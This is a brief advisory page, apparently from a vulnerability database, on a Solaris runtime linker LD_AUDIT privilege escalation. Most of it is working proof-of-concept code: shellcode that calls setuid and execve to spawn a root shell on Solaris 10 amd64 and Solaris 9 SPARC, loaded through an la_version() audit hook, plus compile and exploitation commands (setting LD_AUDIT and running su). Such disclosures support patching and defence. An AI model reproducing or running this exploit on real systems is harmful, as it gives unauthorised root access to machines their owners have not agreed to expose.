|
Sun Solaris Runtime Linker LD_AUDIT Privilege Escalation Vulnerability
An exploit is not required, but proof-of-concept demonstration code was provided. For Solaris 10 on amd64: static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } For Solaris 9 SPARC: char sh[] = /* setuid() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* execve() */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } To compile: gcc -fPIC -shared -o /tmp/dupa.so dupa.c And to exploit: export LD_AUDIT=/tmp/dupa.so su UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. The following proof of concept (Schily-Root.tar) has been provided by KF (lists) (kf_lists@digitalmunition.com) for SchilliX: |
|
|
Privacy Statement |
